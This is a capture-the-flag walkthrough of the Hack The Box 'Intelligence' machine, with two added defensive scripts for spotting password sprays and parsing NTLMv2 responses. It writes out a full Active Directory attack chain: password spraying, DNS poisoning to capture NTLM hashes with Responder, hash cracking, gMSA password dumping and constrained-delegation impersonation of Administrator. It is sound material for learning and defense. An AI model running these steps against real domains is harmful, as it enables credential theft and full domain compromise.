
Intelligence

Open ports: 53, 80, 135, 139, 445, 636, 3269, 49692, 49709
echo "10.129.95.154 intelligence.htb dc.intelligence.htb" >> /etc/hosts
Run a directory brute force with gobuster.
The /documents page returns 403 Forbidden; I tried bypassing it, but that did not work.
gobuster found no subdomains.
SMB anonymous login:
No shares accessible.
Continue with port 80.
Found two PDF files.
Translated, the Latin body text of the PDFs is just filler with no meaningful content.
Two candidate usernames, saved to username.txt: William.Lee, Jose.Williams
kerbrute userenum --dc 10.129.95.154 username.txt -d intelligence.htb
Both users exist in the domain.
GetNPUsers.py intelligence.htb/ -usersfile username.txt -no-pass -request -dc-ip 10.129.95.154
The "do not require pre-auth" flag is not set for either user, so no AS-REP hash comes back.
According to the PDF seen earlier, documents are named by date and stored under the /documents folder, so I wrote a Python script to enumerate files in that folder.
import datetime
import requests

# Documents are named YYYY-MM-DD-upload.pdf under /documents; walk the date
# range day by day and print every URL that returns 200.
start_date = datetime.datetime(2020, 1, 1)
end_date = datetime.datetime(2021, 7, 4)
delta = datetime.timedelta(days=1)

current_date = start_date
while current_date <= end_date:
    url = current_date.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")
    response = requests.get(url, timeout=10)
    if response.status_code == 200:
        print(url)
    current_date += delta
python3 enumeration.py >output
wget -i output
Download all of them.
Convert them all to text files:
for i in *pdf; do pdftotext $i; done
Because there are too many files to read, I grep for sensitive words such as "key" and "pass".
Finally I found one file that contains the word "password"; its language is also different from every other downloaded file.
grep -l "pass" *.txt
2020-06-04-upload.txt

cat 2020-06-04-upload.txt
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
This gives the default password NewIntelligenceCorpUser9876,
but I do not yet have a valid username to go with it.
Judging from the kerbrute userenum result, users in this domain are named [firstname].[lastname], so I extract every author name from the PDF metadata:
exiftool *.pdf | grep Creator | tr -d ' ' | awk -F ':' '{print $2}' >> ../userlist
Now try a password spray with [username]:'NewIntelligenceCorpUser9876'. First confirm the user list:
kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb userlist
All of them are valid users; move on to the password spray.
kerbrute passwordspray userlist NewIntelligenceCorpUser9876 --dc 10.129.95.154 -d intelligence.htb
That did not work.
Try the same spray over SMB:
crackmapexec smb intelligence.htb -u userlist -p 'NewIntelligenceCorpUser9876'
Found a valid credential:
Tiffany.Molina:NewIntelligenceCorpUser9876
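A detection-side view of this step, added here and not part of the original writeup: a kerbrute or crackmapexec spray leaves one authentication failure per account from a single source inside a short burst, a pattern per-account lockout thresholds never trip. The script below runs that logic over a constructed sample of DC Security-log events (account names and the attacker IP are taken from this writeup, two accounts are invented).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC Security-log events, not logs from the box:
# 4771 = Kerberos pre-authentication failed (a spray with a wrong password
# leaves one per account), 4768 = TGT issued (the password was right).
# Fields: time, event id, target account, source IP.
SAMPLE_EVENTS = [
    ("2021-07-04 10:00:01", 4771, "William.Lee",    "10.10.14.11"),
    ("2021-07-04 10:00:01", 4771, "Jose.Williams",  "10.10.14.11"),
    ("2021-07-04 10:00:02", 4771, "Ted.Graves",     "10.10.14.11"),
    ("2021-07-04 10:00:02", 4771, "Jane.Doe",       "10.10.14.11"),  # invented account
    ("2021-07-04 10:00:03", 4768, "Tiffany.Molina", "10.10.14.11"),  # default password still set
    ("2021-07-04 10:00:03", 4771, "John.Smith",     "10.10.14.11"),  # invented account
    ("2021-07-04 09:40:00", 4771, "Ted.Graves",     "10.129.95.50"),  # a user mistyping: no alert
    ("2021-07-04 09:41:00", 4771, "Ted.Graves",     "10.129.95.50"),
]
FAILURE_IDS = {4771, 4625, 4776}  # Kerberos pre-auth, logon, NTLM validation failures
SUCCESS_IDS = {4768, 4624}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: sorted accounts} for every source whose failed
    logons hit at least min_accounts distinct accounts inside one window."""
    fails = defaultdict(list)
    for ts, eid, account, ip in events:
        if eid in FAILURE_IDS:
            fails[ip].append((parse_ts(ts), account))
    alerts = {}
    for ip, entries in fails.items():
        entries.sort()
        for i, (start, _) in enumerate(entries):   # sliding window over sorted failures
            accounts = {a for t, a in entries[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                alerts[ip] = sorted(accounts)
                break
    return alerts

def successes_from_spraying_ips(events, alerts):
    """Accounts that authenticated successfully from a flagged source:
    the spray most likely found their password."""
    return sorted({a for _, eid, a, ip in events if eid in SUCCESS_IDS and ip in alerts})

if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    for ip, accounts in found.items():
        print(f"spray from {ip}: {len(accounts)} accounts, e.g. {accounts[:3]}")
    print("likely compromised:", successes_from_spraying_ips(SAMPLE_EVENTS, found))
```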
smbclient //10.129.95.154/Users -U intelligence.htb/Tiffany.Molina
Retrieved the user flag from the Desktop folder on the Users share.
 
smbclient //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina
Found a PowerShell file on the IT share:
downdetector.ps1: Little-endian UTF-16 Unicode text, with CRLF, LF line terminators
Here is its content:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
  try {
    $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
    if(.StatusCode -ne 200) {
      Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
    }
  } catch {}
}
The script runs every 5 minutes, takes every record in the AD-integrated DNS zone whose name starts with "web", and sends each one an HTTP request with -UseDefaultCredentials, i.e. it authenticates as the account running the scheduled task. If I can add a "web*" DNS record that points at my own host, the script will authenticate to me and I can capture that NTLM authentication.
Searching around, I found dnstool.py in the krbrelayx repository; it can add, remove and modify records in Active Directory-integrated DNS over LDAP (the same repository's addspn.py handles Service Principal Names).
git clone https://github.com/dirkjanm/krbrelayx.git
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web111 -d 10.10.14.11 -t A
responder -I tun0
Start Responder listening on tun0 and wait for the next run of the scheduled script.
Because I'm using the HTB Pwnbox, port 80 was already occupied by a python2.7 process, so I switched back to my Kali Linux box (the target and attacker IPs below differ because this is a fresh instance).
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.224.189 -a add -r web222 -d 10.10.16.13 -t A
[HTTP] NTLMv2 Client   : 10.129.224.189
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:b364c80df1ef91e1:DB28CD14E144EDF2CCE12B91B7536805:01010000000000001F3BA8685B6ADA014480D68E207B2B660000000002000800510056004700550001001E00570049004E002D003800530047003800430039004B0054005300490034000400140051005600470055002E004C004F00430041004C0003003400570049004E002D003800530047003800430039004B0054005300490034002E0051005600470055002E004C004F00430041004C000500140051005600470055002E004C004F00430041004C00080030003000000000000000000000000020000015F9094027228F59E49F80D2E2C49CDBECF32D90C142B7D3247E6A91C27355720A001000000000000000000000000000000000000900380048005400540050002F007700650062003200320032002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
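As an added example (not from the original post), the Python below takes the Responder line above apart: the hashcat -m 5600 fields, then the AV_PAIRs inside the NTLMv2 client blob, which record the client's clock and the service name it believed it was authenticating to. For a defender triaging a captured hash, TargetName shows exactly which spoofed "web*" DNS name the scheduled script connected to, and the FILETIME gives the moment to look for in the DC's DNS and task logs. The blob is the one printed above, re-typed field by field so the MS-NLMP layout is visible.

```python
import struct
from datetime import datetime, timedelta

# The Responder line above in hashcat -m 5600 layout:
# user::domain:server_challenge:NTProofStr:blob (NTLMv2_CLIENT_CHALLENGE).
NTLMV2_LINE = "Ted.Graves::intelligence:b364c80df1ef91e1:DB28CD14E144EDF2CCE12B91B7536805:" + (
    "0101000000000000" "1F3BA8685B6ADA01" "4480D68E207B2B66" "00000000"   # header, FILETIME, client nonce, reserved
    "02000800" "5100560047005500"                                           # AvId 2 NbDomainName
    "01001E00" "570049004E002D003800530047003800430039004B005400530049003400"
    "04001400" "51005600470055002E004C004F00430041004C00"
    "03003400" "570049004E002D003800530047003800430039004B0054005300490034002E0051005600470055002E004C004F00430041004C00"
    "05001400" "51005600470055002E004C004F00430041004C00"
    "08003000" "30000000000000000000000000200000" "15F9094027228F59E49F80D2E2C49CDBECF32D90C142B7D3247E6A91C2735572"
    "0A001000" "00000000000000000000000000000000"                           # channel bindings (none)
    "09003800" "48005400540050002F007700650062003200320032002E0069006E00740065006C006C006900670065006E00630065002E00680074006200"
    "00000000" "00000000")                                                  # MsvAvEOL + padding

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}  # UTF-16LE strings; the rest are binary

def filetime_to_iso(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> ISO 8601 string."""
    return (datetime(1601, 1, 1) + timedelta(microseconds=ft // 10)).isoformat()

def parse_ntlmv2(line):
    """Split a hashcat-5600 line and decode the AV_PAIRs in its client blob."""
    user, _, domain, srv_chal, proof, blob_hex = line.split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # RespType(1) HiRespType(1) Reserved1(2) Reserved2(4) TimeStamp(8)
    # ClientChallenge(8) Reserved3(4) = 28 bytes, then the AV_PAIR list.
    timestamp, client_chal = struct.unpack_from("<8xQ8s4x", blob)
    av, off = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:                       # MsvAvEOL ends the list
            break
        value = blob[off:off + av_len]
        off += av_len
        av[AV_NAMES.get(av_id, f"Av{av_id}")] = (
            value.decode("utf-16-le") if av_id in STRING_AVS else value.hex())
    return {"user": user, "domain": domain, "server_challenge": srv_chal,
            "ntproofstr": proof, "client_time": filetime_to_iso(timestamp),
            "client_challenge": client_chal.hex(), "avpairs": av}

if __name__ == "__main__":
    info = parse_ntlmv2(NTLMV2_LINE)
    print(info["user"], "authenticated to", info["avpairs"]["TargetName"], "at", info["client_time"])
```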
Responder captured Ted.Graves's NTLMv2 response; feed it to hashcat:
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Cracked: Ted.Graves:Mr.Teddy
evil-winrm -i intelligence.htb -u Ted.Graves -p 'Mr.Teddy'
Failed.
Try BloodHound:
/bloodhound.py -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.129.128.237 -c All
BloodHound shows that Ted.Graves can read the managed password of the gMSA account svc_int$ (the ReadGMSAPassword edge), so dump it with gMSADumper.py:
gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb'
svc_int$:::d365e889367ce3e3241b120db1df6e25
svc_int$:aes256-cts-hmac-sha1-96:bdc4e5d502f64ffc7b7044c5a2ca5e41fe784866fcfa548b5b16dfdb73c30d63
svc_int$:aes128-cts-hmac-sha1-96:ce17e93d890939760b64a37bac296dd2
I tried cracking the NT hash, but it is not feasible: gMSA passwords are long random values that AD rotates automatically. The hash itself is enough, though.
BloodHound also shows svc_int$ is trusted for constrained delegation to the SPN WWW/dc.intelligence.htb. With the account's NT hash, getST.py can run S4U2Self/S4U2Proxy to obtain a service ticket for that SPN on behalf of Administrator:
getST.py -spn WWW/dc.intelligence.htb intelligence.htb/svc_int -hashes :d365e889367ce3e3241b120db1df6e25 -impersonate Administrator
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass intelligence.htb/administrator@dc.intelligence.htb
or
wmiexec.py dc.intelligence.htb -k -no-pass
rooted!